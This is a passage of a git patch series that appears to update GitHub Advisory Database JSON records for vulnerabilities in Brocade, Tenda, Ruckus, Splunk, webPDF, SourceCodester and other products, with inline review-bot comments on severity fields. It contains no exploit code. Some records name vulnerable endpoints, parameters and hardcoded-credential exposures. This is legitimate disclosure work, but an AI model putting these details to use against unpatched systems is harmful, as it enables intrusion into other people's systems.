"https://nvd.nist.gov/vuln/detail/CVE-2026-2983" + }, + { + "type": "WEB", + "url": "https://github.com/Shaon-Xis/SRMS-1.0---Unauthenticated-SMTP-Hijacking-to-Account-Takeover#-vulnerability-2-unauthenticated-bulk-account-injection-arbitrary-file-upload" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347366" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347366" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756135" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T10:16:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json b/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json index 32a00258c2093..e530f14cadcf6 100644 
--- a/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json +++ b/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json @@ -46,6 +46,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-266", "CWE-269" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json b/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json index c167ddd1325b3..e46de3eb0692f 100644 --- a/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json +++ b/advisories/unreviewed/2026/02/GHSA-vwfg-jcqm-ff7v/GHSA-vwfg-jcqm-ff7v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vwfg-jcqm-ff7v", - "modified": "2026-02-09T09:30:22Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-09T09:30:22Z", "aliases": [ "CVE-2026-2225" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.753402" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754405" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-wcvw-rr7p-mw54/GHSA-wcvw-rr7p-mw54.json b/advisories/unreviewed/2026/02/GHSA-wcvw-rr7p-mw54/GHSA-wcvw-rr7p-mw54.json new file mode 100644 index 0000000000000..827a12e8ac128 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wcvw-rr7p-mw54/GHSA-wcvw-rr7p-mw54.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcvw-rr7p-mw54", + "modified": "2026-02-23T12:31:30Z", + "published": "2026-02-23T12:31:30Z", + "aliases": [ + "CVE-2026-2984" + ], + "details": "A vulnerability was identified in SourceCodester Student Result Management System 1.0. This affects an unknown function of the file /admin/core/drop_user.php. Such manipulation of the argument ID leads to denial of service. The attack can be executed remotely. The exploit is publicly available and might be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2984" + }, + { + "type": "WEB", + "url": "https://github.com/Shaon-Xis/SRMS-1.0---Unauthenticated-SMTP-Hijacking-to-Account-Takeover#vulnerability-3-unauthenticated-arbitrary-account-deletion-dos" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347367" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347367" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756136" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xm94-xrhg-42m4/GHSA-xm94-xrhg-42m4.json b/advisories/unreviewed/2026/02/GHSA-xm94-xrhg-42m4/GHSA-xm94-xrhg-42m4.json new file mode 100644 index 0000000000000..67bedf7f53130 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xm94-xrhg-42m4/GHSA-xm94-xrhg-42m4.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xm94-xrhg-42m4", + "modified": "2026-02-23T12:31:29Z", + "published": "2026-02-23T12:31:29Z", + "aliases": [ + "CVE-2025-41002" + ], + "details": "SQL injection vulnerability in Infoticketing. This vulnerability allows\n an unauthenticated attacker to retrieve, create, update, and delete the\n database by sending a POST request using the 'code' parameter in '/components/cart/cartApplyDiscount.php'.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41002" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-infoticketing" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T10:16:17Z" + } +} \ No newline at end of file From d56d988100c120508b7f9912deeab91c936d3de3 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 15:32:38 +0000 Subject: [PATCH 53/77] Publish Advisories GHSA-62m6-f67r-3r6p GHSA-m4cp-qj9v-7wpc GHSA-hm8v-8c3v-cxfq GHSA-25cv-hf25-fqf8 GHSA-438c-878c-qvmf GHSA-4h76-926q-wxxw GHSA-c85p-r6x8-fqgr GHSA-cqp7-wf4c-3xgc GHSA-g666-g65w-p8mh GHSA-jxwm-5mrm-6h8j GHSA-mc6c-v4m2-858f GHSA-rq7m-qrq2-mrg5 GHSA-ww95-r66q-v2hh --- .../GHSA-62m6-f67r-3r6p.json | 6 +++- .../GHSA-m4cp-qj9v-7wpc.json | 6 +++- .../GHSA-hm8v-8c3v-cxfq.json | 6 +++- .../GHSA-25cv-hf25-fqf8.json | 15 +++++--- .../GHSA-438c-878c-qvmf.json | 29 +++++++++++++++ .../GHSA-4h76-926q-wxxw.json | 4 ++- .../GHSA-c85p-r6x8-fqgr.json | 36 +++++++++++++++++++ .../GHSA-cqp7-wf4c-3xgc.json | 4 ++- .../GHSA-g666-g65w-p8mh.json | 6 +++- .../GHSA-jxwm-5mrm-6h8j.json | 15 +++++--- .../GHSA-mc6c-v4m2-858f.json | 15 +++++--- .../GHSA-rq7m-qrq2-mrg5.json | 36 +++++++++++++++++++ .../GHSA-ww95-r66q-v2hh.json | 15 +++++--- 13 files changed, 171 insertions(+), 22 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c85p-r6x8-fqgr/GHSA-c85p-r6x8-fqgr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rq7m-qrq2-mrg5/GHSA-rq7m-qrq2-mrg5.json diff --git a/advisories/unreviewed/2025/02/GHSA-62m6-f67r-3r6p/GHSA-62m6-f67r-3r6p.json b/advisories/unreviewed/2025/02/GHSA-62m6-f67r-3r6p/GHSA-62m6-f67r-3r6p.json index 8f27bd27b0f16..76a3df765a22a 100644 --- a/advisories/unreviewed/2025/02/GHSA-62m6-f67r-3r6p/GHSA-62m6-f67r-3r6p.json +++ b/advisories/unreviewed/2025/02/GHSA-62m6-f67r-3r6p/GHSA-62m6-f67r-3r6p.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-62m6-f67r-3r6p", - "modified": "2025-02-15T00:32:47Z", + "modified": "2026-02-23T15:31:14Z", "published": "2025-02-15T00:32:47Z", "aliases": [ "CVE-2024-5462" ], "details": "If Brocade Fabric OS before Fabric OS 9.2.0 configuration settings are not set to encrypt SNMP passwords, then the SNMP privsecret / authsecret fields can be exposed in plaintext. The plaintext passwords can be exposed in a configupload capture or a supportsave capture if encryption of passwords is not enabled. An attacker can use these passwords to fetch values of the supported OIDs via SNMPv3 queries. There are also a limited number of MIB objects that can be modified.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/02/GHSA-m4cp-qj9v-7wpc/GHSA-m4cp-qj9v-7wpc.json b/advisories/unreviewed/2025/02/GHSA-m4cp-qj9v-7wpc/GHSA-m4cp-qj9v-7wpc.json index 9bad0bf22315e..99fee228f76c1 100644 --- a/advisories/unreviewed/2025/02/GHSA-m4cp-qj9v-7wpc/GHSA-m4cp-qj9v-7wpc.json +++ b/advisories/unreviewed/2025/02/GHSA-m4cp-qj9v-7wpc/GHSA-m4cp-qj9v-7wpc.json 
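Review bot: The `CVSS_V3` vector added here (`UI:N`, `C:H/I:N/A:N`) does not describe the same issue as the existing `CVSS_V4` vector in the same array (`UI:P`, `VC:L/VI:L/VA:L`): they disagree on user interaction and on which impacts apply. Consumers that pick one entry by type will prioritise this advisory differently depending on which they read. The `details` text mentions both disclosure of SNMP secrets and a limited number of modifiable MIB objects, so `I:N` in particular looks worth checking against the vendor advisory before the entry is relied on. The rest of the record lies outside the hunk.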
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m4cp-qj9v-7wpc", - "modified": "2025-02-15T00:32:47Z", + "modified": "2026-02-23T15:31:13Z", "published": "2025-02-15T00:32:47Z", "aliases": [ "CVE-2024-5461" ], "details": "Implementation of the Simple Network \nManagement Protocol (SNMP) operating on the Brocade 6547 (FC5022) \nembedded switch blade, makes internal script calls to system.sh from \nwithin the SNMP binary. An authenticated attacker could perform command \nor parameter injection on SNMP operations that are only enabled on the \nBrocade 6547 (FC5022) embedded switch. This injection could allow the \nauthenticated attacker to issue commands as Root.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json b/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json index b1c252820a31e..52b84781bac69 100644 --- a/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json +++ b/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hm8v-8c3v-cxfq", - "modified": "2026-02-05T21:32:35Z", + "modified": "2026-02-23T15:31:14Z", "published": "2025-10-03T12:33:14Z", "aliases": [ "CVE-2025-11234" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:1831" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:3077" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-11234" 
diff --git a/advisories/unreviewed/2026/02/GHSA-25cv-hf25-fqf8/GHSA-25cv-hf25-fqf8.json b/advisories/unreviewed/2026/02/GHSA-25cv-hf25-fqf8/GHSA-25cv-hf25-fqf8.json index 506f73181951a..2202673b7ccea 100644 --- a/advisories/unreviewed/2026/02/GHSA-25cv-hf25-fqf8/GHSA-25cv-hf25-fqf8.json +++ b/advisories/unreviewed/2026/02/GHSA-25cv-hf25-fqf8/GHSA-25cv-hf25-fqf8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-25cv-hf25-fqf8", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T15:31:14Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-69674" ], "details": "Buffer Overflow vulnerability in CDATA FD614GS3-R850 V3.2.7_P161006 (Build.0333.250211) allows an attacker to execute arbitrary code via the node_mac, node_opt, opt_param, and domainblk parameters of the mesh_node_config and domiainblk_config modules", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-120" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T17:24:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json b/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json new file mode 100644 index 0000000000000..22520aafcf059 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json 
@@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-438c-878c-qvmf", + "modified": "2026-02-23T15:31:15Z", + "published": "2026-02-23T15:31:15Z", + "aliases": [ + "CVE-2025-69700" + ], + "details": "Tenda FH1203 V2.0.1.6 contains a stack-based buffer overflow vulnerability in the modify_add_client_prio function, which is reachable via the formSetClientPrio CGI handler.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69700" + }, + { + "type": "WEB", + "url": "https://github.com/xhh0124/SemVulLLM" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T14:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4h76-926q-wxxw/GHSA-4h76-926q-wxxw.json b/advisories/unreviewed/2026/02/GHSA-4h76-926q-wxxw/GHSA-4h76-926q-wxxw.json index 0ec7033b69ac3..1858ccf6ca023 100644 --- a/advisories/unreviewed/2026/02/GHSA-4h76-926q-wxxw/GHSA-4h76-926q-wxxw.json +++ b/advisories/unreviewed/2026/02/GHSA-4h76-926q-wxxw/GHSA-4h76-926q-wxxw.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-601" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-c85p-r6x8-fqgr/GHSA-c85p-r6x8-fqgr.json b/advisories/unreviewed/2026/02/GHSA-c85p-r6x8-fqgr/GHSA-c85p-r6x8-fqgr.json new file mode 100644 index 0000000000000..daa4f02f7935f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c85p-r6x8-fqgr/GHSA-c85p-r6x8-fqgr.json 
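Review bot: GHSA-438c-878c-qvmf is created with `"severity": []`, `"cwe_ids": []` and `"severity": null`, so any consumer that thresholds on severity or groups by CWE treats a stack-based buffer overflow in a CGI handler as unrated. The weakness class is already stated in `details`, so `"cwe_ids": ["CWE-121"]` can be filled in without waiting for a score. Until a CVSS vector is available, triage tooling should handle a null severity as "unknown" rather than "low".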
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c85p-r6x8-fqgr", + "modified": "2026-02-23T15:31:15Z", + "published": "2026-02-23T15:31:15Z", + "aliases": [ + "CVE-2026-21420" + ], + "details": "Dell Repository Manager (DRM), versions prior to 3.4.8, contains an Uncontrolled Search Path Element vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary code execution and escalation of privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21420" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000430183/dsa-2026-059-security-update-for-dell-repository-manager-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T14:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json b/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json index 775d3c79f3a9e..a63eeb989cf73 100644 --- a/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json +++ b/advisories/unreviewed/2026/02/GHSA-cqp7-wf4c-3xgc/GHSA-cqp7-wf4c-3xgc.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-79" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json b/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json index f0d32674372c0..f09a6f34cfec7 100644 --- a/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json 
+++ b/advisories/unreviewed/2026/02/GHSA-g666-g65w-p8mh/GHSA-g666-g65w-p8mh.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g666-g65w-p8mh", - "modified": "2026-02-12T09:30:59Z", + "modified": "2026-02-23T15:31:14Z", "published": "2026-02-12T09:30:59Z", "aliases": [ "CVE-2025-15577" ], "details": "An unauthenticated attacker can exploit this vulnerability by manipulating URL to achieve arbitrary file read access.This issue affects Valmet DNA Web Tools: C2022 and older.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:X/V:D/RE:M/U:Green" diff --git a/advisories/unreviewed/2026/02/GHSA-jxwm-5mrm-6h8j/GHSA-jxwm-5mrm-6h8j.json b/advisories/unreviewed/2026/02/GHSA-jxwm-5mrm-6h8j/GHSA-jxwm-5mrm-6h8j.json index 536ae5480801b..891572a259579 100644 --- a/advisories/unreviewed/2026/02/GHSA-jxwm-5mrm-6h8j/GHSA-jxwm-5mrm-6h8j.json +++ b/advisories/unreviewed/2026/02/GHSA-jxwm-5mrm-6h8j/GHSA-jxwm-5mrm-6h8j.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jxwm-5mrm-6h8j", - "modified": "2026-02-19T21:30:47Z", + "modified": "2026-02-23T15:31:14Z", "published": "2026-02-19T21:30:47Z", "aliases": [ "CVE-2025-67304" ], "details": "In Ruckus Network Director (RND) < 4.5.0.54, the OVA appliance contains hardcoded credentials for the ruckus PostgreSQL database user. In the default configuration, the PostgreSQL service is accessible over the network on TCP port 5432. An attacker can use the hardcoded credentials to authenticate remotely, gaining superuser access to the database. This allows creation of administrative users for the web interface, extraction of password hashes, and execution of arbitrary OS commands.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T20:25:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mc6c-v4m2-858f/GHSA-mc6c-v4m2-858f.json b/advisories/unreviewed/2026/02/GHSA-mc6c-v4m2-858f/GHSA-mc6c-v4m2-858f.json index 12970f95c57c7..0acb8892b1f42 100644 --- a/advisories/unreviewed/2026/02/GHSA-mc6c-v4m2-858f/GHSA-mc6c-v4m2-858f.json +++ b/advisories/unreviewed/2026/02/GHSA-mc6c-v4m2-858f/GHSA-mc6c-v4m2-858f.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mc6c-v4m2-858f", - "modified": "2026-02-19T21:30:48Z", + "modified": "2026-02-23T15:31:14Z", "published": "2026-02-19T21:30:48Z", "aliases": [ "CVE-2025-67305" ], "details": "In RUCKUS Network Director (RND) < 4.5.0.56, the OVA appliance contains hardcoded SSH keys for the postgres user. These keys are identical across all deployments, allowing an attacker with network access to authenticate via SSH without a password. Once authenticated, the attacker can access the PostgreSQL database with superuser privileges, create administrative users for the web interface, and potentially escalate privileges further.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-321" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T21:18:28Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rq7m-qrq2-mrg5/GHSA-rq7m-qrq2-mrg5.json b/advisories/unreviewed/2026/02/GHSA-rq7m-qrq2-mrg5/GHSA-rq7m-qrq2-mrg5.json new file mode 100644 index 0000000000000..0dbe618ff64df --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rq7m-qrq2-mrg5/GHSA-rq7m-qrq2-mrg5.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq7m-qrq2-mrg5", + "modified": "2026-02-23T15:31:14Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20142" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.7, 9.3.9, and 9.2.11, a user of a Splunk Search Head Cluster (SHC) deployment who holds a role with access to the Splunk `_internal` index could view the RSA `accessKey` value from the [Authentication.conf ](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/10.2/configuration-file-reference/10.2.0-configuration-file-reference/authentication.conf)file, in plain text.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20142" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0207" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json b/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json index e6e0fe1cba379..de4efc4d764a6 100644 --- a/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json +++ b/advisories/unreviewed/2026/02/GHSA-ww95-r66q-v2hh/GHSA-ww95-r66q-v2hh.json 
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-ww95-r66q-v2hh",
- "modified": "2026-02-19T15:30:35Z",
+ "modified": "2026-02-23T15:31:14Z",
 "published": "2026-02-19T15:30:35Z",
 "aliases": [
 "CVE-2025-55853"
 ],
 "details": "SoftVision webPDF before 10.0.2 is vulnerable to Server-Side Request Forgery (SSRF). The PDF converter function does not check if internal or external resources are requested in the uploaded files and allows for protocols such as http:// and file:///. This allows an attacker to upload an XML or HTML file in the application, which when rendered to a PDF allows for internal port scanning and Local File Inclusion (LFI).",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -24,8 +29,10 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T15:16:11Z"
From 153075bd07f0be14e7e2dcbe7e84d26bd33a9e28 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 18:33:02 +0000 Subject: [PATCH 54/77] Advisory Database Sync --- .../GHSA-9vr7-rp6q-4v56.json | 10 +++- .../GHSA-r5q9-m2x7-ffq7.json | 10 +++- .../GHSA-386j-h4xj-j5ph.json | 2 +- .../GHSA-4v5p-6cwv-27q5.json | 2 +- .../GHSA-5rqh-7vr7-2xv6.json | 2 +- .../GHSA-5wr3-pfv7-cqv6.json | 2 +- .../GHSA-79w3-7qr6-6x7v.json | 2 +- .../GHSA-f475-9c64-jrvp.json | 2 +- .../GHSA-fh2p-293q-jmxp.json | 2 +- .../GHSA-j2mp-wxpv-6jr8.json | 2 +- .../GHSA-m2vp-mjvj-xgg7.json | 2 +- .../GHSA-pmhj-hpgr-f94j.json | 2 +- .../GHSA-q4pw-cw84-2mfm.json | 2 +- .../GHSA-w5jh-vr73-453v.json | 2 +- .../GHSA-5mc7-p6pj-r3f5.json | 10 +++- .../GHSA-38fx-8cr9-9925.json | 11 +++- .../GHSA-4jh8-xj74-jhxx.json | 44 +++++++++++++++ .../GHSA-4w36-hgqj-cjp2.json | 56 +++++++++++++++++++ .../GHSA-62pw-p3ph-rgh9.json | 44 +++++++++++++++ .../GHSA-663h-2vr3-ghrj.json | 37 ++++++++++++ .../GHSA-6pjc-995p-mh58.json | 40 +++++++++++++ .../GHSA-744p-mq95-2m92.json | 29 ++++++++++ .../GHSA-9hjg-4h75-mvc5.json | 44 +++++++++++++++ .../GHSA-c3f3-cc42-xr9v.json | 11 +++- .../GHSA-gfw7-2v73-69wg.json | 11 +++- .../GHSA-h2mx-ppvp-v2rq.json | 37 ++++++++++++ .../GHSA-jqx8-f6x9-hm34.json | 44 +++++++++++++++ .../GHSA-m575-4pr9-x5xr.json | 44 +++++++++++++++ .../GHSA-mv94-7vf6-c5q6.json | 56 +++++++++++++++++++ .../GHSA-p76h-f4cx-3273.json | 36 ++++++++++++ .../GHSA-pj4q-4jcg-hp2c.json | 36 ++++++++++++ .../GHSA-q4hc-vp2m-fr47.json | 40 +++++++++++++ .../GHSA-q6w4-grhv-wcp8.json | 44 +++++++++++++++ .../GHSA-vm54-j482-hx4h.json | 44 +++++++++++++++ .../GHSA-xfxx-38qx-mrf4.json | 11 +++- 35 files changed, 744 insertions(+), 29 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-4jh8-xj74-jhxx/GHSA-4jh8-xj74-jhxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4w36-hgqj-cjp2/GHSA-4w36-hgqj-cjp2.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-62pw-p3ph-rgh9/GHSA-62pw-p3ph-rgh9.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-663h-2vr3-ghrj/GHSA-663h-2vr3-ghrj.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-6pjc-995p-mh58/GHSA-6pjc-995p-mh58.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json
